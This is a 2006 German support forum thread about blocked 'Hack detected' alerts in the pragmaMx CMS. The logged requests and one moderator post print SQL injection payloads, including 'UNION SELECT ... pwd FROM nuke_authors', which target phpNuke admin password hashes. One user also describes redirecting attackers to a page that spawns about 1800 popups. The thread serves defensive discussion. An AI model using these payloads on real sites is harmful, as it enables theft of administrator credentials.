pragmaMx Support Forum pragmaMx Support Forum

Hack detected

0 Mitglieder und 1 Gast betrachten dieses Thema.

Offline fjuergens

  • *****
  • 613
  • +0/-22
  • Geschlecht: Männlich
  • Gruß aus Athen
    • Veranstaltungen in Athen und andere Informationen aus Athen und Umgebung
Hack detected
« am: 17 April 2006, 20:48:14 »
Hallo zusammen,
was ist das bzw. was fange ich damit an ???
Handelt sich um eine Domain von einer Freundin.
Sie hat folgende Mail erhalten:

12-04-2006 11:35:21 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[name] = Search 
_POST[query] = test 
_POST[type] = comments 
_POST[sid] = 0' UNION SELECT pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          87.120.5.2
QUERY_STRING:         name=Search
REQUEST_URI:          /welt/modules.php?name=Search
REMOTE_PORT:          44343
REMOTE_HOST:         
HTTP_REFERER:         
HTTP_USER_AGENT:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
HTTP_X_FORWARDED_FOR: 87.120.87.178

siteadress: http://www.gabyswelt.info/welt

Danke im voraus
mit netten Grüßen aus Athen / GR
F.Juergens

Offline RiotheRat

  • *******
  • 1.956
  • +0/-1
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #1 am: 17 April 2006, 22:29:37 »
Es hat jemand verrsucht über die Suche das System Deiner Freundin zu hacken. Er wollte gerne das Adminpasswort wissen  ;D Das System hat den Hack erkannt, geblockt und als Resultat diese Mail rausgehauen um darüber zu informieren dass ein gblockter Angriff  ::) stattgefundfen hat.

Du und die Freundin müssen sich also keinen Kopf machen ... ein  sinnloser, geblockter Hack ...

RtR
Unaufgeforderte PNs & Emails werden ignoriert

Erst wenn die letzte Zeile Code verhunzt, der letzte Server gehackt und der letzte Script-Kidde befriedigt ist, erst dann, werdet Ihr feststellen, dass Nuke nicht sicher ist...

Offline fjuergens

  • *****
  • 613
  • +0/-22
  • Geschlecht: Männlich
  • Gruß aus Athen
    • Veranstaltungen in Athen und andere Informationen aus Athen und Umgebung
Re: Hack detected
« Antwort #2 am: 17 April 2006, 22:34:29 »
Hallo Rio,
Danke für die schnelle Antwort
mit netten Grüßen aus Athen / GR
F.Juergens

Offline Puschel

  • ***
  • 126
  • +0/-0
Re: Hack detected
« Antwort #3 am: 19 April 2006, 12:36:34 »
Hatte heute ähnlichen Fall und wunderte mich auch erst über die Mail. Aber gibt ja zum Glück die Suche hier :).
Das hier stand drin:

19-04-2006 00:24:49 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories 
_GET[topic] =   
_GET[category] = 0 
_GET[days] = 0 
_GET[sid] = 0 
_GET[name] = Search 
_GET[query] = p0gg0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          85.96.245.201
QUERY_STRING:         type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          2913
REMOTE_HOST:         
HTTP_REFERER:         http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT:      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP_X_FORWARDED_FOR:




Ist die "REMOTE_ADDR" die IP von dem, der den Hack versucht hat? Würde es dann was bringen, diese zu sperren? Oder kann man sich das im Prinzip sparen, da er im Pragma auch beim nächsten Mal keinen Erfolg haben wird? :)
Durch das Brett vorm Kopf hat man den Zahnstocher immer griffbereit

Offline Andi

  • *****
  • 18.832
  • +4/-0
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #4 am: 19 April 2006, 12:53:29 »
Hi :)

die ip zu sperren bringt nix, beim nächsten mal hat der ne andere....

Der "Hacker" war ein ahnungsloser doofer scriptkiddie, der den Exploit von waraxe's advisory 1:1 übernommen hat. Manche meinen, wenn sie irgendwo was aufschnappen können sie gleich die halbe Welt hacken....

[waraxe-2006-SA#046] - Critical sql injection in phpNuke 7.5-7.8
http://www.waraxe.us/advisory-46.html
schön´s Grüssle, Andi

Offline NeMeSiSX2LC

  • *******
  • 3.604
  • +0/-3
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #5 am: 19 April 2006, 19:49:20 »
Gibt aber leider auch durchaus Seiten wo dieser "hack" greift... :(

Also keine MX, die armen Nuker.... :D
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

Offline Andi

  • *****
  • 18.832
  • +4/-0
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #6 am: 19 April 2006, 23:06:05 »
Trotzdem doofer Scriptkiddie, der nichtmal sieht ob er phpnuke oder sonstwas vor sich hat...  :)
Bekomme die mails ja fast immer in Kopie und zu 95% sind die Angriffe die Standardtexte per cut & paste in die Browserzeile gehackt, oder diese idiotischen Standardhackerformulare wo alle möglichen Nuke-Hacks interaktiv aufgelistet sind. Die Dummköppe machen sich nichtmal die Mühe den richtigen Tabellenprefix zu ermitteln, was ja in Nuke kein Problem ist....
schön´s Grüssle, Andi

Offline Puschel

  • ***
  • 126
  • +0/-0
Re: Hack detected
« Antwort #7 am: 20 April 2006, 19:16:14 »
Naja, aber scheinbar lernt er nicht aus seinen "Fehlern"... Da eben wieder eine Mail kam, vermute ich mal, da ist der gleiche am Werk:

20-04-2006 18:41:25 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories 
_GET[topic] =   
_GET[category] = 0 
_GET[days] = 0 
_GET[sid] = 0 
_GET[name] = Search 
_GET[query] = g0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          85.97.108.5
QUERY_STRING:         type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          4101
REMOTE_HOST:         
HTTP_REFERER:         http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
HTTP_X_FORWARDED_FOR:


siteadress: http://www.gamezcheck.de




Sieht dem letzten Versuch doch sehr ähnlich ;)
Durch das Brett vorm Kopf hat man den Zahnstocher immer griffbereit

Offline Andi

  • *****
  • 18.832
  • +4/-0
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #8 am: 20 April 2006, 19:30:15 »
Wie bereits gesagt, diese mails bekomme ich (bzw. das ganze team) zu dutzenden am Tag.
Vergesst es einfach, den Schitt braucht ihr hier nicht zu posten, sonst haben wir bald das Forum damit voll....

Jeder Depp kann das sein, er braucht deine Seite einfach nur mit dieser URL aufrufen:

http://www.deineseite.tld/modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNI0N+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*

Wenn sich das häuft und du die Benachrichtigung nicht erhalten willst, so kannst du das in der /includes/detection/config.php abschalten.// mailadressen, wo die Detection hinversendet werden soll
// weitere Adressen können nach dem gleichen Schema zugefügt werden
// um kein Mail zu versenden, einfach diese Zeilen auskommentieren oder löschen
$conf['sendmail'][] = $GLOBALS['adminmail']; // Standardadminmailadresse, kann auch mit anderem Wert belegt werden :-))
$conf['sendmail'][] = 'ids@pragmamx.org';    // Falls das Entwicklerteam ebenfalls benachrichtigt werden soll

Ich vermute mal, dass die meisten Idioten, die das probieren, garnicht wissen, was sie als Ergebnis bekommen könnten. Selbst wenn, dann bekämen die nur die Adminpasswörter als md5-hash. Das nützt denen bei pragmaMx auch nix, weil die damit keinen Admincookie fälschen können. Den gibt es im pragmaMx nämlich garnicht...
schön´s Grüssle, Andi

Offline Okimen

  • ***
  • 146
  • +0/-0
  • Geschlecht: Männlich
  • Dieses Leben ist eines der härtesten!
Re: Hack detected
« Antwort #9 am: 29 April 2006, 17:58:15 »
Hallo Ihr lieben,
ist aber trotz allem sehr schön und sehr beruhigend dies zu lesen. Vor allem wenn man wie ich bzw. meine damals noch php-nuke seiten zweimal gehackt wurden.
Das ganze ist jetzt ca.3 Wochen her, und wirklich verdammt beruhigend. Macht mut neue und weitere Sachen zu probieren, ohne das man Angst haben muss, das irgendein Hacker oder Möchtegernhacker einem das wieder zerstört.

Danke für diese Beruhigung!

VG Dirk ;D

Offline Andi

  • *****
  • 18.832
  • +4/-0
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #10 am: 29 April 2006, 18:05:11 »
Hi :)

nunja, das bedeutet aber keine 100%ige Sicherheit, gelle  ;) ;)
schön´s Grüssle, Andi

Offline Okimen

  • ***
  • 146
  • +0/-0
  • Geschlecht: Männlich
  • Dieses Leben ist eines der härtesten!
Re: Hack detected
« Antwort #11 am: 29 April 2006, 18:51:24 »
Hallo Andi,
gut, aber was ist heute schon 100%ig? Oft reichen ja 98% ;) ;D

VG Dirk

Offline --helmi-

  • ***
  • 234
  • +0/-0
  • Geschlecht: Männlich
  • "Mehr Kult für Dich!"
"Hacker" ärgern.. / Re: Hack detected
« Antwort #12 am: 29 April 2006, 19:13:38 »


Hi Andi..

Zur Zeit häufen sich diese Atacken wieder bei mir..  :D
Und so überlege ich, ob es nicht möglich wäre, diese Jungs auch mal etwas zu ärgern..
oder zumindest zu verwirren: Wäre es möglich bei solchen Angriffen eine bestimmte Seite zu öffnen..?
Meinetwegen in der Art von:  Wir kennen Dich: Hier ist deine IP, dein OS, dein Browser, dein "C:\ - Verzeichnis" (soll ja mit JS ganz einfach gehen..!?) ..   Jetzt wird Deine Pladde formatiert.. usw..   ;D 8) :)

Wäre sowas (mit wenig Aufwand) möglich..?   ::) ;)

---


*******************
Viele Grüße: --helmi- !


>>---Mission Control 42 -->


---

Offline Andi

  • *****
  • 18.832
  • +4/-0
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #13 am: 29 April 2006, 19:28:58 »
Moin :)

meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Wenn ja, kannst du einfach auf eine andere Seite umleiten, indem du die /includes/detection/config.php anpasst:
// Weiterleiten auf andere Seite oder leerlassen um mit Fehlermeldung direkt abzubrechen
$conf['redirect'] = 'http://www.google.de/'; #

Standardmässig wird da auf die index.php umgeleitet, da kannst du aber jede x-beliebige Seite einsetzen.
Heheeee, z.B. auf diesen Thread ;)
schön´s Grüssle, Andi

Offline --helmi-

  • ***
  • 234
  • +0/-0
  • Geschlecht: Männlich
  • "Mehr Kult für Dich!"
Re: Hack detected
« Antwort #14 am: 30 April 2006, 21:54:21 »
MoinMoin Andi  ;) :)

Zitat
Moin
meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Naja.. manche Kiddies wirds vielleicht beieindrucken..?  ::)
Sind ja IMHO nicht alles "Profis" / Freaks..   Denke (hoffe) mal das der Großteil der Atacken von eher unbedarften Kiddies kommt, die irgendwelche Instant-Scripte alle mal der Reihe nach anklicken / probieren..  ::) ;)

Danke mal für Deinen Code-Tipp! werds mal verwurschteln!
Wenn  dann irgendwelche Häufungen von Panikatacken bei den Kiddies bekannt werden, geb ich hier nochmal Bescheid.. *lol*  ;D






*******************
Viele Grüße: --helmi- !


>>---Mission Control 42 -->


---

Offline Okimen

  • ***
  • 146
  • +0/-0
  • Geschlecht: Männlich
  • Dieses Leben ist eines der härtesten!
Re: Hack detected
« Antwort #15 am: 30 April 2006, 22:50:24 »
Hallo,
gut "Profis" würde das wohl kaum erschrecken, aber bei den "Kiddis" die da meinen sie könnten die ganze Welt hacken, stelle ich mir das schon komisch vor!

Viel Spaß!

VG Dirk

Offline NeMeSiSX2LC

  • *******
  • 3.604
  • +0/-3
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #16 am: 01 Mai 2006, 01:25:11 »
Wenn ich diese Meldung so sehe dann ist das doch ne Aktuelle von **** Und es gibt echt Seiten  wo das geht (Nuke) Bloss bissel ahnung müsste derjenige doch haben. Sonst kann er mit dem Resultat nix anfangen ;)
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

Offline Andi

  • *****
  • 18.832
  • +4/-0
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #17 am: 01 Mai 2006, 02:11:12 »
Klar funktioniert das in phpNuke ;)

Aber etliche Leute haben immer noch nicht kapiert, dass pragmaMx mit nuke genauso viel gemeinsam hat, wie postNuke. Ob die postNuke Jungs auch so unter dieser beschissenen Erblast leiden müssen....
schön´s Grüssle, Andi

Offline m-t

  • *******
  • 1.218
  • +8/-11
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #18 am: 01 Mai 2006, 11:17:22 »
meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay

weitergeleitet,

Vorsicht lieber nicht aufrufen! Es öffnen sich ca. 1800 Fenster. Den PC kannst dann neu starten da kommt kein PopUp Blocker mit :-)

Seitdem ich das drinhatte haben sich die Hackversuche in Minutenabständen etwas verringert, beeindrucken kann ich niemand damit das is klar. Aber ein bischen Schadenfreude ist schon dabei.

Offline Apfelkomplott

  • **
  • 31
  • +0/-1
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #19 am: 18 Mai 2006, 20:08:54 »
Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay
Also, da würde ich doch eher die URL eines Werbepartners eintragen, der per Click/View bezahlt ... ;-)

Offline m-t

  • *******
  • 1.218
  • +8/-11
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #20 am: 24 Mai 2006, 16:32:04 »
Also, da würde ich doch eher die URL eines Werbepartners eintragen, der per Click/View bezahlt ... ;-)

Das war noch bei Nuke, aber die Idee ist toll :-)

Offline schnikemike

  • *****
  • 715
  • +0/-1
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #21 am: 06 August 2006, 23:06:57 »
ist das  eigendlich noch ein überbleibsel oder beabsichtigt?



$conf['sendmail'][] = 'ids@pragmamx.org'; // Falls das Entwicklerteam ebenfalls benachrichtigt werden soll



Da kommen ja dann ziug solcher mails bei euch an.

Lg
Wer anderen eine Grube gräbt der hat ein Grubengrabgerät!
 

Offline der_luecke

  • ******
  • 1.172
  • +1/-1
  • Geschlecht: Männlich
Re: Hack detected
« Antwort #22 am: 06 August 2006, 23:26:26 »
Jupp, wir wollen doch wissen, was versucht wird ;)

und jupp es ist eine Menge los, SPAM ist lächerlich dagegen ;D
Grüsse
Olaf

Kein Support über Mail, (ungefragter) PN oder ICQ, ausschließlich direkt im Forum!
Das ich so was mal schreiben muss;-)